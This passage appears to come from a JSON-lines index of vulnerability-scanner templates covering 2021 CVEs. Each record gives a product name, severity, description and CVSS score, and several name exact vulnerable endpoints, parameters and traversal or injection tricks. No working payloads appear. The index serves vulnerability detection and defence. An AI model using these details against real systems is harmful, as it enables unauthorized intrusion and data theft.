\u003c= 9.4.40, \u003c= 10.0.2, \u003c= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-28169.yaml"} +{"ID":"CVE-2021-28377","Info":{"Name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","Severity":"medium","Description":"Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-28377.yaml"} +{"ID":"CVE-2021-28854","Info":{"Name":"VICIdial Sensitive Information Disclosure","Severity":"high","Description":"VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-28854.yaml"} +{"ID":"CVE-2021-28918","Info":{"Name":"Netmask NPM Package - Server-Side Request Forgery","Severity":"critical","Description":"Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2021/CVE-2021-28918.yaml"} +{"ID":"CVE-2021-28937","Info":{"Name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","Severity":"high","Description":"Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-28937.yaml"} +{"ID":"CVE-2021-29156","Info":{"Name":"LDAP Injection In OpenAM","Severity":"high","Description":"OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-29156.yaml"} +{"ID":"CVE-2021-29203","Info":{"Name":"HPE Edgeline Infrastructure Manager \u003c1.22 - Authentication Bypass","Severity":"critical","Description":"HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-29203.yaml"} +{"ID":"CVE-2021-29441","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"critical","Description":"This template only works on Nuclei engine prior to version 2.3.3 and version \u003e= 2.3.5.\n\nIn Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\nNacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that\nenables Nacos servers to bypass this filter and therefore skip authentication checks.\nThis mechanism relies on the user-agent HTTP header so it can be easily spoofed.\nThis issue may allow any user to carry out any administrative tasks on the Nacos server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-29441.yaml"} +{"ID":"CVE-2021-29442","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"high","Description":"Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-29442.yaml"} +{"ID":"CVE-2021-29484","Info":{"Name":"Ghost CMS \u003c=4.32 - Cross-Site Scripting","Severity":"medium","Description":"Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code.","Classification":{"CVSSScore":"6.8"}},"file_path":"cves/2021/CVE-2021-29484.yaml"} +{"ID":"CVE-2021-29490","Info":{"Name":"Jellyfin 10.7.2 - SSRF","Severity":"medium","Description":"Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"cves/2021/CVE-2021-29490.yaml"} +{"ID":"CVE-2021-29622","Info":{"Name":"Prometheus - Open Redirect","Severity":"medium","Description":"Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-29622.yaml"} +{"ID":"CVE-2021-29625","Info":{"Name":"Adminer \u003c=4.8.0 - Cross-Site Scripting","Severity":"medium","Description":"Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-29625.yaml"} +{"ID":"CVE-2021-3002","Info":{"Name":"Seo Panel 4.8.0 - Cross-Site Scripting","Severity":"medium","Description":"Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-3002.yaml"} +{"ID":"CVE-2021-30049","Info":{"Name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","Severity":"medium","Description":"SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-30049.yaml"} +{"ID":"CVE-2021-30128","Info":{"Name":"Apache OFBiz \u003c17.12.07 - Arbitrary Code Execution","Severity":"critical","Description":"Apache OFBiz has unsafe deserialization prior to 17.12.07 version","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-30128.yaml"} +{"ID":"CVE-2021-30151","Info":{"Name":"Sidekiq \u003c=6.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-30151.yaml"} +{"ID":"CVE-2021-3017","Info":{"Name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","Severity":"high","Description":"Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-3017.yaml"} +{"ID":"CVE-2021-3019","Info":{"Name":"ffay lanproxy Directory Traversal","Severity":"high","Description":"ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-3019.yaml"} +{"ID":"CVE-2021-30213","Info":{"Name":"Knowage Suite 7.3 - Cross-Site Scripting","Severity":"medium","Description":"Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-30213.yaml"} +{"ID":"CVE-2021-30461","Info":{"Name":"VoipMonitor \u003c24.61 - Remote Code Execution","Severity":"critical","Description":"VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-30461.yaml"} +{"ID":"CVE-2021-30497","Info":{"Name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","Severity":"high","Description":"Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-30497.yaml"} +{"ID":"CVE-2021-3110","Info":{"Name":"PrestaShop 1.7.7.0 - SQL Injection","Severity":"critical","Description":"PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-3110.yaml"} +{"ID":"CVE-2021-31249","Info":{"Name":"CHIYU TCP/IP Converter devices - CRLF injection","Severity":"medium","Description":"A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-31249.yaml"} +{"ID":"CVE-2021-31250","Info":{"Name":"CHIYU TCP/IP Converter - Cross-Site Scripting","Severity":"medium","Description":"CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-31250.yaml"} +{"ID":"CVE-2021-3129","Info":{"Name":"Laravel with Ignition \u003c= v8.4.2 Debug Mode - Remote Code Execution","Severity":"critical","Description":"Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-3129.yaml"} +{"ID":"CVE-2021-31537","Info":{"Name":"SIS Informatik REWE GO SP17 \u003c7.7 - Cross-Site Scripting","Severity":"medium","Description":"SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-31537.yaml"} +{"ID":"CVE-2021-31581","Info":{"Name":"Akkadian Provisioning Manager MariaDB Credentials","Severity":"medium","Description":"The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be escaped by abusing the 'Edit MySQL Configuration' command. This command launches a standard vi editor interface which can then be escaped. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later).","Classification":{"CVSSScore":"4.4"}},"file_path":"cves/2021/CVE-2021-31581.yaml"} +{"ID":"CVE-2021-31589","Info":{"Name":"BeyondTrust Secure Remote Access Base \u003c=6.0.1 - Cross-Site Scripting","Severity":"medium","Description":"BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-31589.yaml"} +{"ID":"CVE-2021-31602","Info":{"Name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","Severity":"high","Description":"Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-31602.yaml"} +{"ID":"CVE-2021-31682","Info":{"Name":"WebCTRL OEM \u003c= 6.5 - Cross-Site Scripting","Severity":"medium","Description":"WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-31682.yaml"} +{"ID":"CVE-2021-31755","Info":{"Name":"Tenda Router AC11 - Remote Command Injection","Severity":"critical","Description":"Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-31755.yaml"} +{"ID":"CVE-2021-31805","Info":{"Name":"Apache Struts2 S2-062 - Remote Code Execution","Severity":"critical","Description":"Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-31805.yaml"} +{"ID":"CVE-2021-31856","Info":{"Name":"Layer5 Meshery 0.5.2 - SQL Injection","Severity":"critical","Description":"Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-31856.yaml"} +{"ID":"CVE-2021-31862","Info":{"Name":"SysAid 20.4.74 - Cross-Site Scripting","Severity":"medium","Description":"SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-31862.yaml"} +{"ID":"CVE-2021-32030","Info":{"Name":"ASUS GT-AC2900 - Authentication Bypass","Severity":"critical","Description":"ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\u0000' matches the device's default value of '\u0000' in some situations.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-32030.yaml"} +{"ID":"CVE-2021-32172","Info":{"Name":"Maian Cart \u003c=3.8 - Remote Code Execution","Severity":"critical","Description":"Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-32172.yaml"} +{"ID":"CVE-2021-3223","Info":{"Name":"Node RED Dashboard \u003c2.26.2 - Local File Inclusion","Severity":"high","Description":"NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-3223.yaml"} +{"ID":"CVE-2021-32305","Info":{"Name":"Websvn \u003c2.6.1 - Remote Code Execution","Severity":"critical","Description":"WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-32305.yaml"} +{"ID":"CVE-2021-32618","Info":{"Name":"Python Flask-Security - Open Redirect","Severity":"medium","Description":"Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-32618.yaml"} +{"ID":"CVE-2021-32682","Info":{"Name":"elFinder 2.1.58 - Remote Code Execution","Severity":"critical","Description":"elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-32682.yaml"} +{"ID":"CVE-2021-32789","Info":{"Name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","Severity":"high","Description":"woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-32789.yaml"} +{"ID":"CVE-2021-32819","Info":{"Name":"Nodejs Squirrelly - Remote Code Execution","Severity":"high","Description":"Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-32819.yaml"} +{"ID":"CVE-2021-32820","Info":{"Name":"Express-handlebars - Local File Inclusion","Severity":"high","Description":"Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2021/CVE-2021-32820.yaml"} +{"ID":"CVE-2021-32853","Info":{"Name":"Erxes \u003c0.23.0 - Cross-Site Scripting","Severity":"medium","Description":"Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-32853.yaml"} +{"ID":"CVE-2021-3293","Info":{"Name":"emlog 5.3.1 Path Disclosure","Severity":"high","Description":"emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-3293.yaml"} +{"ID":"CVE-2021-3297","Info":{"Name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","Severity":"high","Description":"Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.","Classification":{"CVSSScore":"7.8"}},"file_path":"cves/2021/CVE-2021-3297.yaml"} +{"ID":"CVE-2021-33044","Info":{"Name":"Dahua IPC/VTH/VTO - Authentication Bypass","Severity":"critical","Description":"Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-33044.yaml"} +{"ID":"CVE-2021-33221","Info":{"Name":"CommScope Ruckus IoT Controller - Information Disclosure","Severity":"critical","Description":"CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-33221.yaml"} +{"ID":"CVE-2021-33357","Info":{"Name":"RaspAP \u003c=2.6.5 - Remote Command Injection","Severity":"critical","Description":"RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the \"iface\" GET parameter in /ajax/networking/get_netcfg.php, when the \"iface\" parameter value contains special characters such as \";\".\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-33357.yaml"} +{"ID":"CVE-2021-33544","Info":{"Name":"Geutebruck - Remote Command Injection","Severity":"high","Description":"Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2021/CVE-2021-33544.yaml"} +{"ID":"CVE-2021-33564","Info":{"Name":"Ruby Dragonfly \u003c1.4.0 - Remote Code Execution","Severity":"critical","Description":"Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-33564.yaml"} +{"ID":"CVE-2021-3374","Info":{"Name":"Rstudio Shiny Server \u003c1.5.16 - Local File Inclusion","Severity":"medium","Description":"Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-3374.yaml"} +{"ID":"CVE-2021-3377","Info":{"Name":"npm ansi_up v4 - Cross-Site Scripting","Severity":"medium","Description":"npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-3377.yaml"} +{"ID":"CVE-2021-3378","Info":{"Name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","Severity":"critical","Description":"FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a \"Content-Type: image/png\" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-3378.yaml"} +{"ID":"CVE-2021-33807","Info":{"Name":"Cartadis Gespage 8.2.1 - Directory Traversal","Severity":"high","Description":"Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-33807.yaml"} +{"ID":"CVE-2021-33851","Info":{"Name":"WordPress Customize Login Image \u003c3.5.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-33851.yaml"} +{"ID":"CVE-2021-33904","Info":{"Name":"Accela Civic Platform \u003c=21.1 - Cross-Site Scripting","Severity":"medium","Description":"Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-33904.yaml"} +{"ID":"CVE-2021-34370","Info":{"Name":"Accela Civic Platform \u003c=21.1 - Cross-Site Scripting","Severity":"medium","Description":"Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-34370.yaml"} +{"ID":"CVE-2021-34429","Info":{"Name":"Jetty Authorization Before Parsing and Canonicalization Variation","Severity":"medium","Description":"For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 \u0026 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-34429.yaml"} +{"ID":"CVE-2021-34473","Info":{"Name":"Exchange Server - Remote Code Execution","Severity":"critical","Description":"Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-34473.yaml"} +{"ID":"CVE-2021-34621","Info":{"Name":"WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness","Severity":"critical","Description":"ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-34621.yaml"} +{"ID":"CVE-2021-34640","Info":{"Name":"WordPress Securimage-WP-Fixed \u003c=3.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-34640.yaml"} +{"ID":"CVE-2021-34643","Info":{"Name":"WordPress Skaut Bazar \u003c1.3.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-34643.yaml"} +{"ID":"CVE-2021-34805","Info":{"Name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","Severity":"high","Description":"FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-34805.yaml"} +{"ID":"CVE-2021-35265","Info":{"Name":"MaxSite CMS Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.\"","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-35265.yaml"} +{"ID":"CVE-2021-35336","Info":{"Name":"Tieline IP Audio Gateway \u003c=2.6.4.8 - Unauthorized Remote Admin Panel Access","Severity":"critical","Description":"Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-35336.yaml"} +{"ID":"CVE-2021-35380","Info":{"Name":"TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read","Severity":"high","Description":"A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-35380.yaml"} +{"ID":"CVE-2021-35464","Info":{"Name":"ForgeRock OpenAM \u003c7.0 - Remote Code Execution","Severity":"critical","Description":"ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages.\nThe exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted\n/ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO)\nfound in versions of Java 8 or earlier.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-35464.yaml"} +{"ID":"CVE-2021-35488","Info":{"Name":"Thruk 2.40-2 - Cross-Site Scripting","Severity":"medium","Description":"Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined\u0026title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-35488.yaml"} +{"ID":"CVE-2021-35587","Info":{"Name":"Oracle Access Manager - Remote Code Execution","Severity":"critical","Description":"The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-35587.yaml"} +{"ID":"CVE-2021-3577","Info":{"Name":"Motorola Baby Monitors - Remote Command Execution","Severity":"high","Description":"Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-3577.yaml"} +{"ID":"CVE-2021-36260","Info":{"Name":"Hikvision IP camera/NVR - Remote Command Execution","Severity":"critical","Description":"Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-36260.yaml"} +{"ID":"CVE-2021-36356","Info":{"Name":"Kramer VIAware - Remote Code Execution","Severity":"critical","Description":"KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable 